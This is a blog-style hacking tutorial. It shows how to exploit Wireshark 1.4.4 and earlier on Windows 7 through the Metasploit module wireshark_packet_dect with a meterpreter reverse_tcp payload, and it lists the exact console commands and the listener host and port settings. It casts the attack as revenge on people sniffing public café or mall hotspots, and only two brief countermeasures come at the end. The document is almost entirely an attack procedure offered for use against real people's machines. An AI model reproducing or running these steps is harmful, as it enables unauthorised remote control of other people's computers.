Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit + Backtrack 5 R1

Type : Tutorial

Level : Medium

Victim O.S : Windows 7 SP1 (All Windows is vulnerable)

Vulnerable Application : Wireshark <= 1.4.4

What is Wireshark?

Maybe for people who like to learn about networking & security 95% of them should be know about this tool. According to wikipedia, Wireshark is :

a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

for hacking purpose, this tool usually used to capture the packet (TCP/UDP) that came accross wired network or wireless network.

While I'm in Bandung, Indonesia when connected to a free hotspot service inside a mall or café usually your firewall will show an alert every 5 minutes or less, that's because a lot of some kind of people who want to try scanning or collecting packet and intercepting the network, etc…even once a time I see someone was playing with their Wireshark inside that hotspot.

From my story above, it should be really uncomfortable when you know that someone collecting your data using Wireshark and they hope to get something important data from it.

In this tutorial let's say it was operation payback because attacker trying to collecting our data and we will pwned their computer…fair isn't it? 🙂

Requirements :

1. Metasploit Framework

2. Operating System (I'm using Backtrack 5 R1 in this tutorial)

Step By Step Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit:

1. As we know that when you're running Wireshark and collecting data it should not in a short time range (1 or 2 minutes), but when you run this tool you will need to collect as much data as possible. When you want to collect a huge data you also need more time, but when you want to collect only a little data you only need a little time also.

2. In this case we will pwned the attacker who capturing our data using Wireshark that sent across the network. Let's open your metasploit by typing msfconsole and use wireshark_packet_dect exploit.

use exploit/windows/misc/wireshark_packet_dect

set payload windows/meterpreter/reverse_tcp

3. To view the available options for this exploit, just run show options command from your msf console. In the following picture I'm just set up the important switch that need to set up to perform this attack.

information :

set interface eth0 --> our network card interface, to know which one you use 
wlan0 or eth0 just run ifconfig from your backtrack console

set lhost 192.168.8.92 --> your local computer use to attack

set lport 443 --> when exploit successfully executed, which port you want
to receive the payload in your local computer

4. Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.

5. Now run the exploit command.

Pwned!

FYI : this attack doesn't always success 100%, if there's no one using their wireshark to capture data in a network then your exploit will return error message

Countermeasures :

1. Update your Wireshark to the latest version.

2. Use tunneling or encryption to protect your data.

Hope it's useful 🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful: